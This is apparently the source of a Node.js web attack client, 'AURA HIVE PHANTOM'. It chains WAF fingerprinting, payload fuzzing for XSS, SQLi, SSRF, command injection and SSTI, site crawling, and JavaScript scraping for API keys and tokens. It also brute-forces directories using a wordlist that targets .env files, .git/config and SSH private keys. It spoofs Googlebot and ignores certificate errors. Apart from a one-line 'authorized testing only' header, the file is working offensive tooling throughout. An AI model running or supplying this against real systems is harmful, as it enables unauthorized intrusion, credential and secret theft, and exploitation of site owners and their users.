// ════════════════════════════════════════════════════════════════
//  💀 AURA HIVE v6.0 "PHANTOM" — ATTACK CLIENT
//  HTTP weapon: fuzzer, WAF detection, response analysis,
//  session crawling, form extraction, auto-exploit pipeline
//  ⚠️ FOR AUTHORIZED PENETRATION TESTING ONLY
// ════════════════════════════════════════════════════════════════
const https = require('https');
const http = require('http');
const { URL } = require('url');
const crypto = require('crypto');
const { EventEmitter } = require('events');
const { PAYLOADS } = require('./exploit-lab');

// ════════════════════════════════════════════
// WAF SIGNATURES
// ════════════════════════════════════════════
const WAF_SIGNATURES = {
    cloudflare: {
        headers: ['cf-ray', 'cf-cache-status', 'cf-request-id', 'server: cloudflare'],
        body: ['Attention Required! | Cloudflare', 'cf-browser-verification', 'Ray ID:'],
        status: [403, 503]
    },
    aws_waf: {
        headers: ['x-amzn-requestid', 'x-amz-cf-id'],
        body: ['Request blocked', 'AWS WAF'],
        status: [403]
    },
    modsecurity: {
        headers: ['server: apache', 'mod_security'],
        body: ['ModSecurity', 'Mod_Security', 'NOYB'],
        status: [403, 406]
    },
    akamai: {
        headers: ['x-akamai-transformed', 'akamai-grn', 'server: akamaighost'],
        body: ['Access Denied', 'AkamaiGHost'],
        status: [403]
    },
    sucuri: {
        headers: ['x-sucuri-id', 'x-sucuri-cache', 'server: sucuri'],
        body: ['Sucuri Website Firewall', 'Access Denied - Sucuri'],
        status: [403]
    },
    imperva: {
        headers: ['x-iinfo', 'x-cdn'],
        body: ['Incapsula incident', 'Powered by Incapsula', '_Incapsula_Resource'],
        status: [403]
    },
    f5_bigip: {
        headers: ['x-cnection', 'x-wa-info', 'server: bigip'],
        body: ['The requested URL was rejected', 'BIG-IP'],
        status: [403]
    },
    wordfence: {
        body: ['Generated by Wordfence', 'wordfence', 'wfAction'],
        status: [403, 503]
    }
};

// ════════════════════════════════════════════
// USER AGENT ROTATION
// ════════════════════════════════════════════
const USER_AGENTS = [
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
    'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 14.2; rv:121.0) Gecko/20100101 Firefox/121.0',
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0',
    'Mozilla/5.0 (iPhone; CPU iPhone OS 17_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Mobile/15E148 Safari/604.1',
    'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
];

// ════════════════════════════════════════════
// COMMON WORDLIST FOR DIR BRUTEFORCE
// ════════════════════════════════════════════
const DIR_WORDLIST = [
    'admin', 'administrator', 'api', 'api/v1', 'api/v2', 'api/v3',
    'backup', 'backups', 'beta', 'blog', 'cache', 'cgi-bin',
    'config', 'configuration', 'console', 'cp', 'cpanel',
    'dashboard', 'db', 'database', 'debug', 'dev', 'developer',
    'docs', 'dump', 'editor', 'email', 'env', 'error',
    'files', 'ftp', 'graphql', 'help', 'hidden', 'home',
    'images', 'img', 'include', 'includes', 'internal',
    'jenkins', 'log', 'login', 'logs', 'mail', 'manage',
    'manager', 'media', 'member', 'members', 'monitoring',
    'mysql', 'new', 'old', 'panel', 'password', 'phpmyadmin',
    'portal', 'private', 'profile', 'public', 'register',
    'reset', 'root', 'rss', 'search', 'secret', 'secure',
    'server-status', 'server-info', 'setup', 'shell', 'signin',
    'signup', 'sitemap.xml', 'sql', 'ssh', 'staging', 'static',
    'status', 'storage', 'store', 'support', 'swagger',
    'system', 'temp', 'test', 'testing', 'tmp', 'token',
    'tools', 'upload', 'uploads', 'user', 'users', 'vendor',
    'version', 'web', 'webmail', 'wordpress', 'wp-admin',
    'wp-content', 'wp-includes', 'wp-login.php', 'xmlrpc.php',
    '.env', '.git', '.git/config', '.git/HEAD', '.gitignore',
    '.htaccess', '.htpasswd', '.svn', '.svn/entries',
    'robots.txt', 'sitemap.xml', 'crossdomain.xml',
    'composer.json', 'package.json', 'Gruntfile.js',
    'Dockerfile', 'docker-compose.yml', '.dockerignore',
    'web.config', 'elmah.axd', 'trace.axd',
    'server.log', 'error.log', 'access.log', 'debug.log',
    'wp-config.php.bak', 'config.php.bak', '.env.bak',
    'id_rsa', 'id_dsa', '.bash_history', '.ssh/id_rsa'
];

// ════════════════════════════════════════════
// ATTACK CLIENT CLASS
// ════════════════════════════════════════════
class AttackClient extends EventEmitter {
    constructor(options = {}) {
        super();
        this.sessions = new Map();
        this.requestDelay = options.requestDelay || 200;   // ms between requests
        this.timeout = options.timeout || 10000;            // request timeout
        this.maxConcurrent = options.maxConcurrent || 5;
        this.followRedirects = options.followRedirects !== false;
        this.maxRedirects = options.maxRedirects || 5;
        this.activeRequests = 0;
    }

    // ═══════════════════════════════════════
    // CORE HTTP ENGINE
    // ═══════════════════════════════════════

    // Send a single HTTP request
    async request(urlStr, options = {}) {
        const method = (options.method || 'GET').toUpperCase();
        const headers = {
            'User-Agent': options.userAgent || USER_AGENTS[Math.floor(Math.random() * USER_AGENTS.length)],
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'en-US,en;q=0.5',
            'Accept-Encoding': 'identity',
            'Connection': 'close',
            ...options.headers
        };

        if (options.cookies) {
            headers['Cookie'] = typeof options.cookies === 'string'
                ? options.cookies
                : Object.entries(options.cookies).map(([k, v]) => `${k}=${v}`).join('; ');
        }
        if (options.bearer) headers['Authorization'] = `Bearer ${options.bearer}`;
        if (options.basicAuth) {
            const encoded = Buffer.from(`${options.basicAuth.user}:${options.basicAuth.pass}`).toString('base64');
            headers['Authorization'] = `Basic ${encoded}`;
        }

        let body = null;
        if (options.body) {
            if (typeof options.body === 'object') {
                if (options.contentType === 'form') {
                    body = Object.entries(options.body).map(([k, v]) => `${encodeURIComponent(k)}=${encodeURIComponent(v)}`).join('&');
                    headers['Content-Type'] = 'application/x-www-form-urlencoded';
                } else {
                    body = JSON.stringify(options.body);
                    headers['Content-Type'] = 'application/json';
                }
            } else {
                body = options.body;
                if (!headers['Content-Type']) headers['Content-Type'] = 'text/plain';
            }
            headers['Content-Length'] = Buffer.byteLength(body);
        }

        return new Promise((resolve) => {
            const startTime = Date.now();
            let redirectCount = 0;

            const makeRequest = (currentUrl) => {
                try {
                    const parsed = new URL(currentUrl);
                    const lib = parsed.protocol === 'https:' ? https : http;

                    const reqOptions = {
                        hostname: parsed.hostname,
                        port: parsed.port || (parsed.protocol === 'https:' ? 443 : 80),
                        path: parsed.pathname + parsed.search,
                        method,
                        headers,
                        timeout: this.timeout,
                        rejectUnauthorized: false // Accept self-signed certs
                    };

                    const req = lib.request(reqOptions, (res) => {
                        let data = '';
                        res.on('data', chunk => data += chunk);
                        res.on('end', () => {
                            const elapsed = Date.now() - startTime;

                            // Handle redirects
                            if ([301, 302, 303, 307, 308].includes(res.statusCode) && this.followRedirects && redirectCount < this.maxRedirects) {
                                const location = res.headers['location'];
                                if (location) {
                                    redirectCount++;
                                    const nextUrl = location.startsWith('http') ? location : new URL(location, currentUrl).toString();
                                    return makeRequest(nextUrl);
                                }
                            }

                            resolve({
                                success: true,
                                url: currentUrl,
                                status: res.statusCode,
                                headers: res.headers,
                                body: data,
                                bodyLength: data.length,
                                elapsed,
                                redirects: redirectCount
                            });
                        });
                    });

                    req.on('timeout', () => {
                        req.destroy();
                        resolve({ success: false, url: currentUrl, error: 'Timeout', elapsed: Date.now() - startTime });
                    });

                    req.on('error', (err) => {
                        resolve({ success: false, url: currentUrl, error: err.message, elapsed: Date.now() - startTime });
                    });

                    if (body) req.write(body);
                    req.end();
                } catch (err) {
                    resolve({ success: false, url: currentUrl, error: err.message, elapsed: 0 });
                }
            };

            makeRequest(urlStr);
        });
    }

    // ═══════════════════════════════════════
    // WAF DETECTION
    // ═══════════════════════════════════════

    async detectWAF(targetUrl) {
        // Send a normal request first
        const baseline = await this.request(targetUrl);
        if (!baseline.success) return { detected: false, error: baseline.error };

        // Send a malicious-looking request to trigger WAF
        const maliciousUrl = `${targetUrl}${targetUrl.includes('?') ? '&' : '?'}test=<script>alert(1)</script>&id=1' OR 1=1--`;
        const triggered = await this.request(maliciousUrl);

        const detected = [];

        for (const [wafName, sig] of Object.entries(WAF_SIGNATURES)) {
            let score = 0;

            // Check headers
            if (sig.headers) {
                const headerStr = JSON.stringify(baseline.headers || {}).toLowerCase() + JSON.stringify(triggered.headers || {}).toLowerCase();
                for (const h of sig.headers) {
                    if (headerStr.includes(h.toLowerCase())) score += 2;
                }
            }

            // Check body
            if (sig.body && triggered.body) {
                for (const b of sig.body) {
                    if (triggered.body.includes(b)) score += 3;
                }
            }

            // Check status code difference
            if (sig.status && triggered.status && sig.status.includes(triggered.status) && baseline.status !== triggered.status) {
                score += 2;
            }

            if (score >= 2) {
                detected.push({ waf: wafName, confidence: Math.min(score * 15, 100) + '%' });
            }
        }

        return {
            detected: detected.length > 0,
            wafs: detected,
            baseline_status: baseline.status,
            triggered_status: triggered.success ? triggered.status : 'failed',
            recommendation: detected.length > 0
                ? `WAF detected. Use waf_bypass payloads for ${detected.map(d => d.waf).join(', ')}`
                : 'No WAF detected. Standard payloads should work.'
        };
    }

    // ═══════════════════════════════════════
    // PARAMETER FUZZER
    // ═══════════════════════════════════════

    async fuzzParameter(targetUrl, paramName, attackType, options = {}) {
        const sessionId = crypto.randomBytes(8).toString('hex');
        const payloadSet = this._getPayloads(attackType, options.subcategory);
        if (!payloadSet || payloadSet.length === 0) {
            return { error: `No payloads for type: ${attackType}` };
        }

        const session = {
            id: sessionId,
            target: targetUrl,
            parameter: paramName,
            attack_type: attackType,
            started: new Date().toISOString(),
            total_payloads: payloadSet.length,
            tested: 0,
            findings: [],
            errors: 0,
            status: 'running'
        };
        this.sessions.set(sessionId, session);
        this.emit('attack:started', { sessionId, target: targetUrl, type: attackType });

        for (const payload of payloadSet) {
            await this._sleep(this.requestDelay);

            try {
                const method = (options.method || 'GET').toUpperCase();
                let response;

                if (method === 'GET') {
                    const url = new URL(targetUrl);
                    url.searchParams.set(paramName, payload);
                    response = await this.request(url.toString());
                } else {
                    const body = { ...(options.bodyParams || {}), [paramName]: payload };
                    response = await this.request(targetUrl, {
                        method,
                        body,
                        contentType: options.contentType || 'form',
                        headers: options.headers,
                        cookies: options.cookies
                    });
                }

                session.tested++;

                // Analyze response for vulnerability indicators
                const analysis = this._analyzeResponse(response, payload, attackType);

                if (analysis.vulnerable) {
                    const finding = {
                        payload,
                        status: response.status,
                        elapsed: response.elapsed,
                        evidence: analysis.evidence,
                        confidence: analysis.confidence,
                        type: analysis.type
                    };
                    session.findings.push(finding);
                    this.emit('attack:finding', { sessionId, finding });
                }
            } catch (err) {
                session.errors++;
            }
        }

        session.status = 'complete';
        session.finished = new Date().toISOString();
        session.summary = {
            total_tested: session.tested,
            vulnerabilities_found: session.findings.length,
            error_count: session.errors,
            risk_level: session.findings.length > 5 ? 'CRITICAL' : session.findings.length > 0 ? 'HIGH' : 'LOW'
        };

        this.emit('attack:complete', { sessionId, summary: session.summary });
        return session;
    }

    // Analyze a response for vulnerability indicators
    _analyzeResponse(response, payload, attackType) {
        if (!response.success) return { vulnerable: false };

        const body = response.body || '';
        const result = { vulnerable: false, evidence: [], confidence: 'LOW', type: attackType };

        switch (attackType) {
            case 'xss':
                // Check if payload is reflected in response
                if (body.includes(payload)) {
                    result.vulnerable = true;
                    result.evidence.push('Payload reflected in response body (unencoded)');
                    result.confidence = 'HIGH';
                }
                // Check for partial reflection
                const stripped = payload.replace(/<\/?[^>]+>/g, '');
                if (stripped && body.includes(stripped) && body.includes('<')) {
                    result.evidence.push('Partial payload reflection detected');
                    if (!result.vulnerable) { result.vulnerable = true; result.confidence = 'MEDIUM'; }
                }
                break;

            case 'sqli':
                // SQL error signatures
                const sqlErrors = [
                    'SQL syntax', 'mysql_fetch', 'ORA-', 'PostgreSQL',
                    'SQLite3::', 'SQLSTATE', 'unclosed quotation mark',
                    'quoted string not properly terminated',
                    'Microsoft SQL', 'ODBC SQL Server', 'pg_query',
                    'warning: mysql', 'valid MySQL result',
                    'You have an error in your SQL syntax',
                    'supplied argument is not a valid MySQL'
                ];
                for (const sig of sqlErrors) {
                    if (body.toLowerCase().includes(sig.toLowerCase())) {
                        result.vulnerable = true;
                        result.evidence.push(`SQL error detected: "${sig}"`);
                        result.confidence = 'HIGH';
                    }
                }
                // Time-based detection
                if (response.elapsed > 4500 && payload.toLowerCase().includes('sleep')) {
                    result.vulnerable = true;
                    result.evidence.push(`Time-based: Response took ${response.elapsed}ms (expected ~5000ms for SLEEP(5))`);
                    result.confidence = 'MEDIUM';
                }
                break;

            case 'ssrf':
                // Check for internal service responses
                if (body.includes('ami-') || body.includes('instance-id') || body.includes('local-ipv4')) {
                    result.vulnerable = true;
                    result.evidence.push('AWS metadata response detected');
                    result.confidence = 'CRITICAL';
                }
                if (body.includes('computeMetadata') || body.includes('service-accounts')) {
                    result.vulnerable = true;
                    result.evidence.push('GCP metadata response detected');
                    result.confidence = 'CRITICAL';
                }
                if (response.status === 200 && response.bodyLength > 0 && payload.includes('127.0.0.1')) {
                    result.vulnerable = true;
                    result.evidence.push('Internal service response received');
                    result.confidence = 'MEDIUM';
                }
                break;

            case 'cmdi':
                // Check for command output
                const cmdSignatures = ['uid=', 'gid=', 'groups=', 'root:', 'www-data', 'bin/bash', 'WINDOWS', 'Directory of'];
                for (const sig of cmdSignatures) {
                    if (body.includes(sig)) {
                        result.vulnerable = true;
                        result.evidence.push(`Command output detected: "${sig}"`);
                        result.confidence = 'CRITICAL';
                    }
                }
                break;

            case 'ssti':
                // Check if template expression was evaluated
                if (payload.includes('7*7') && body.includes('49')) {
                    result.vulnerable = true;
                    result.evidence.push('Template expression {{7*7}} evaluated to 49');
                    result.confidence = 'HIGH';
                }
                if (payload.includes("7*'7'") && body.includes('7777777')) {
                    result.vulnerable = true;
                    result.evidence.push("Jinja2 detected: {{7*'7'}} = 7777777");
                    result.confidence = 'HIGH';
                }
                break;

            case 'redirect':
                // Open redirect detection
                if (response.redirects > 0 && response.headers?.location) {
                    const loc = response.headers.location;
                    if (loc.includes('evil.com') || !loc.startsWith('/')) {
                        result.vulnerable = true;
                        result.evidence.push(`Redirect to external URL: ${loc}`);
                        result.confidence = 'HIGH';
                    }
                }
                break;
        }

        return result;
    }

    // ═══════════════════════════════════════
    // DEEP CRAWLER
    // ═══════════════════════════════════════

    async crawl(targetUrl, options = {}) {
        const maxPages = options.maxPages || 50;
        const visited = new Set();
        const queue = [targetUrl];
        const results = {
            pages: [],
            forms: [],
            endpoints: [],
            scripts: [],
            emails: [],
            comments: []
        };

        const baseHost = new URL(targetUrl).hostname;

        while (queue.length > 0 && visited.size < maxPages) {
            const url = queue.shift();
            if (visited.has(url)) continue;
            visited.add(url);

            await this._sleep(this.requestDelay);
            const response = await this.request(url);
            if (!response.success || !response.body) continue;

            const page = {
                url,
                status: response.status,
                contentLength: response.bodyLength,
                title: this._extractTitle(response.body)
            };
            results.pages.push(page);

            // Extract forms
            const forms = this._extractForms(response.body, url);
            results.forms.push(...forms);

            // Extract links (same domain only)
            const links = this._extractLinks(response.body, url, baseHost);
            for (const link of links) {
                if (!visited.has(link)) queue.push(link);
            }

            // Extract scripts
            const scripts = this._extractScripts(response.body, url);
            results.scripts.push(...scripts);

            // Extract emails
            const emailMatches = response.body.match(/[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}/g);
            if (emailMatches) results.emails.push(...new Set(emailMatches));

            // Extract HTML comments (can leak info)
            const commentMatches = response.body.match(/<!--[\s\S]*?-->/g);
            if (commentMatches) {
                results.comments.push(...commentMatches.filter(c => c.length > 10).map(c => ({
                    page: url,
                    comment: c.substring(0, 200)
                })));
            }

            this.emit('crawl:page', { url, formsFound: forms.length, linksFound: links.length });
        }

        results.emails = [...new Set(results.emails)];
        results.summary = {
            pages_crawled: results.pages.length,
            forms_found: results.forms.length,
            unique_endpoints: results.endpoints.length,
            scripts_found: results.scripts.length,
            emails_found: results.emails.length,
            comments_found: results.comments.length
        };

        return results;
    }

    // Extract forms from HTML
    _extractForms(html, pageUrl) {
        const forms = [];
        const formRegex = /<form[^>]*>([\s\S]*?)<\/form>/gi;
        let match;

        while ((match = formRegex.exec(html)) !== null) {
            const formTag = match[0];
            const formContent = match[1];

            // Extract action
            const actionMatch = formTag.match(/action\s*=\s*["']([^"']*)/i);
            let action = actionMatch ? actionMatch[1] : pageUrl;
            if (action && !action.startsWith('http')) {
                try { action = new URL(action, pageUrl).toString(); } catch { action = pageUrl; }
            }

            // Extract method
            const methodMatch = formTag.match(/method\s*=\s*["']([^"']*)/i);
            const method = methodMatch ? methodMatch[1].toUpperCase() : 'GET';

            // Extract inputs
            const inputs = [];
            const inputRegex = /<input[^>]*>/gi;
            let inputMatch;
            while ((inputMatch = inputRegex.exec(formContent)) !== null) {
                const tag = inputMatch[0];
                const nameMatch = tag.match(/name\s*=\s*["']([^"']*)/i);
                const typeMatch = tag.match(/type\s*=\s*["']([^"']*)/i);
                const valueMatch = tag.match(/value\s*=\s*["']([^"']*)/i);
                if (nameMatch) {
                    inputs.push({
                        name: nameMatch[1],
                        type: typeMatch ? typeMatch[1] : 'text',
                        value: valueMatch ? valueMatch[1] : ''
                    });
                }
            }

            // Extract textareas
            const textareaRegex = /<textarea[^>]*name\s*=\s*["']([^"']*)[^>]*>/gi;
            let taMatch;
            while ((taMatch = textareaRegex.exec(formContent)) !== null) {
                inputs.push({ name: taMatch[1], type: 'textarea', value: '' });
            }

            // Extract selects
            const selectRegex = /<select[^>]*name\s*=\s*["']([^"']*)[^>]*>/gi;
            let selMatch;
            while ((selMatch = selectRegex.exec(formContent)) !== null) {
                inputs.push({ name: selMatch[1], type: 'select', value: '' });
            }

            forms.push({ page: pageUrl, action, method, inputs, fuzzable_params: inputs.filter(i => !['hidden', 'submit', 'button', 'csrf', 'token'].some(t => i.type === t || i.name.toLowerCase().includes(t))).map(i => i.name) });
        }

        return forms;
    }

    // Extract links from HTML
    _extractLinks(html, pageUrl, baseHost) {
        const links = [];
        const linkRegex = /href\s*=\s*["']([^"'#]*)/gi;
        let match;

        while ((match = linkRegex.exec(html)) !== null) {
            let href = match[1].trim();
            if (!href || href.startsWith('javascript:') || href.startsWith('mailto:') || href.startsWith('tel:')) continue;

            try {
                const absolute = href.startsWith('http') ? href : new URL(href, pageUrl).toString();
                const parsed = new URL(absolute);
                if (parsed.hostname === baseHost || parsed.hostname.endsWith('.' + baseHost)) {
                    links.push(absolute.split('#')[0]);
                }
            } catch { /* skip invalid URLs */ }
        }

        return [...new Set(links)];
    }

    // Extract scripts from HTML
    _extractScripts(html, pageUrl) {
        const scripts = [];
        const scriptRegex = /<script[^>]*src\s*=\s*["']([^"']*)/gi;
        let match;

        while ((match = scriptRegex.exec(html)) !== null) {
            let src = match[1];
            try {
                const absolute = src.startsWith('http') ? src : new URL(src, pageUrl).toString();
                scripts.push({ url: absolute, page: pageUrl });
            } catch { /* skip */ }
        }

        return scripts;
    }

    // Extract page title
    _extractTitle(html) {
        const match = html.match(/<title[^>]*>([\s\S]*?)<\/title>/i);
        return match ? match[1].trim().substring(0, 100) : 'Untitled';
    }

    // ═══════════════════════════════════════
    // DIRECTORY BRUTE-FORCE
    // ═══════════════════════════════════════

    async dirBrute(targetUrl, options = {}) {
        const wordlist = options.wordlist || DIR_WORDLIST;
        const extensions = options.extensions || ['', '.php', '.html', '.asp', '.aspx', '.jsp', '.json', '.xml', '.txt', '.bak', '.old'];
        const threads = options.threads || 10;

        const baseUrl = targetUrl.endsWith('/') ? targetUrl : targetUrl + '/';
        const results = { found: [], tested: 0, errors: 0 };

        // Generate all paths to test
        const paths = [];
        for (const word of wordlist) {
            for (const ext of extensions) {
                paths.push(word + ext);
            }
        }

        // Process in batches
        for (let i = 0; i < paths.length; i += threads) {
            const batch = paths.slice(i, i + threads);
            const promises = batch.map(async (p) => {
                const url = baseUrl + p;
                const response = await this.request(url, { method: 'HEAD' });
                results.tested++;

                if (response.success && ![404, 403, 500, 502, 503].includes(response.status)) {
                    const entry = {
                        path: '/' + p,
                        url,
                        status: response.status,
                        contentLength: response.headers?.['content-length'] || 'unknown'
                    };
                    results.found.push(entry);
                    this.emit('dirbrute:found', entry);
                }
            });

            await Promise.all(promises);
            await this._sleep(50); // Small delay between batches
        }

        results.summary = {
            total_tested: results.tested,
            paths_found: results.found.length,
            interesting: results.found.filter(f => ['.env', '.git', 'config', 'backup', 'admin', 'phpmyadmin'].some(k => f.path.includes(k)))
        };

        return results;
    }

    // ═══════════════════════════════════════
    // AUTO-EXPLOIT PIPELINE
    // ═══════════════════════════════════════

    async autoExploit(targetUrl, options = {}) {
        const sessionId = crypto.randomBytes(8).toString('hex');
        const attackTypes = options.attackTypes || ['xss', 'sqli', 'ssti'];

        const report = {
            id: sessionId,
            target: targetUrl,
            started: new Date().toISOString(),
            phases: {},
            findings: [],
            status: 'running'
        };

        this.sessions.set(sessionId, report);
        this.emit('autoexploit:started', { sessionId, target: targetUrl });

        // Phase 1: WAF Detection
        this.emit('autoexploit:phase', { sessionId, phase: 'waf_detection' });
        report.phases.waf = await this.detectWAF(targetUrl);

        // Phase 2: Crawl & Discover
        this.emit('autoexploit:phase', { sessionId, phase: 'crawling' });
        report.phases.crawl = await this.crawl(targetUrl, { maxPages: options.maxPages || 20 });

        // Phase 3: Fuzz every discovered form parameter
        this.emit('autoexploit:phase', { sessionId, phase: 'fuzzing' });
        const fuzzResults = [];

        for (const form of report.phases.crawl.forms) {
            for (const param of form.fuzzable_params) {
                for (const attackType of attackTypes) {
                    // Use WAF-bypass payloads if WAF detected
                    const sub = report.phases.waf.detected ? 'waf_bypass' : null;

                    const fuzzResult = await this.fuzzParameter(
                        form.action,
                        param,
                        attackType,
                        {
                            method: form.method,
                            subcategory: sub,
                            contentType: 'form',
                            ...options
                        }
                    );

                    if (fuzzResult.findings && fuzzResult.findings.length > 0) {
                        fuzzResults.push({
                            form_action: form.action,
                            parameter: param,
                            attack_type: attackType,
                            findings: fuzzResult.findings
                        });
                    }
                }
            }
        }

        report.phases.fuzzing = fuzzResults;
        report.findings = fuzzResults.flatMap(r => r.findings.map(f => ({
            ...f,
            url: r.form_action,
            parameter: r.parameter,
            attack_type: r.attack_type
        })));

        // Phase 4: Directory Brute-force
        this.emit('autoexploit:phase', { sessionId, phase: 'dir_bruteforce' });
        report.phases.directories = await this.dirBrute(targetUrl, { threads: 5 });

        report.status = 'complete';
        report.finished = new Date().toISOString();
        report.summary = {
            pages_crawled: report.phases.crawl.summary.pages_crawled,
            forms_found: report.phases.crawl.summary.forms_found,
            waf_detected: report.phases.waf.detected,
            waf_names: report.phases.waf.wafs?.map(w => w.waf) || [],
            total_vulnerabilities: report.findings.length,
            critical: report.findings.filter(f => f.confidence === 'CRITICAL').length,
            high: report.findings.filter(f => f.confidence === 'HIGH').length,
            medium: report.findings.filter(f => f.confidence === 'MEDIUM').length,
            directories_found: report.phases.directories.summary.paths_found,
            risk_level: report.findings.length > 5 ? 'CRITICAL' : report.findings.length > 0 ? 'HIGH' : 'LOW'
        };

        this.emit('autoexploit:complete', { sessionId, summary: report.summary });
        return report;
    }

    // ═══════════════════════════════════════
    // JS ENDPOINT EXTRACTION
    // ═══════════════════════════════════════

    async extractJSEndpoints(targetUrl) {
        // First crawl to find all JS files
        const response = await this.request(targetUrl);
        if (!response.success) return { error: response.error };

        const scripts = this._extractScripts(response.body, targetUrl);
        const endpoints = [];
        const secrets = [];

        for (const script of scripts) {
            await this._sleep(this.requestDelay);
            const jsResponse = await this.request(script.url);
            if (!jsResponse.success) continue;

            const js = jsResponse.body;

            // Extract API endpoints
            const apiPatterns = [
                /["'`](\/api\/[a-zA-Z0-9/_-]+)/g,
                /["'`](\/v[0-9]+\/[a-zA-Z0-9/_-]+)/g,
                /["'`](https?:\/\/[^"'`\s]+\/api\/[^"'`\s]+)/g,
                /fetch\s*\(\s*["'`]([^"'`]+)/g,
                /axios\.[a-z]+\s*\(\s*["'`]([^"'`]+)/g,
                /\.(?:get|post|put|delete|patch)\s*\(\s*["'`]([^"'`]+)/g,
                /url\s*[:=]\s*["'`]([^"'`]*\/[^"'`]+)/g
            ];

            for (const pattern of apiPatterns) {
                let match;
                while ((match = pattern.exec(js)) !== null) {
                    endpoints.push({ endpoint: match[1], source: script.url });
                }
            }

            // Extract potential secrets
            const secretPatterns = [
                { name: 'API Key', pattern: /["'`]([a-zA-Z0-9_-]{20,})["'`]\s*(?:,|\))/g },
                { name: 'AWS Key', pattern: /AKIA[0-9A-Z]{16}/g },
                { name: 'Bearer Token', pattern: /Bearer\s+[a-zA-Z0-9._-]+/g },
                { name: 'Private Key', pattern: /-----BEGIN (?:RSA |EC )?PRIVATE KEY-----/g },
                { name: 'Google API', pattern: /AIza[0-9A-Za-z_-]{35}/g },
                { name: 'Firebase', pattern: /[a-z0-9-]+\.firebaseio\.com/g },
                { name: 'Stripe Key', pattern: /[sr]k_(?:live|test)_[a-zA-Z0-9]{24,}/g }
            ];

            for (const { name, pattern } of secretPatterns) {
                let match;
                while ((match = pattern.exec(js)) !== null) {
                    secrets.push({ type: name, value: match[0].substring(0, 50) + '...', source: script.url });
                }
            }
        }

        // Deduplicate
        const uniqueEndpoints = [...new Map(endpoints.map(e => [e.endpoint, e])).values()];

        return {
            scripts_analyzed: scripts.length,
            endpoints: uniqueEndpoints,
            secrets,
            total_endpoints: uniqueEndpoints.length,
            total_secrets: secrets.length
        };
    }

    // ═══════════════════════════════════════
    // UTILITY
    // ═══════════════════════════════════════

    _getPayloads(type, subcategory) {
        const lib = PAYLOADS[type];
        if (!lib) return [];

        if (subcategory && lib[subcategory] && Array.isArray(lib[subcategory])) {
            return lib[subcategory];
        }

        // Combine all sub-arrays
        const all = [];
        for (const val of Object.values(lib)) {
            if (Array.isArray(val)) all.push(...val);
        }
        return all.length > 0 ? all : [];
    }

    _sleep(ms) {
        return new Promise(resolve => setTimeout(resolve, ms));
    }

    // Get session results
    getSession(sessionId) {
        return this.sessions.get(sessionId) || null;
    }

    getSessions() {
        return [...this.sessions.entries()].map(([id, s]) => ({
            id,
            target: s.target,
            status: s.status,
            findings: s.findings?.length || s.summary?.total_vulnerabilities || 0,
            started: s.started
        }));
    }
}

module.exports = { AttackClient, WAF_SIGNATURES, DIR_WORDLIST, USER_AGENTS };
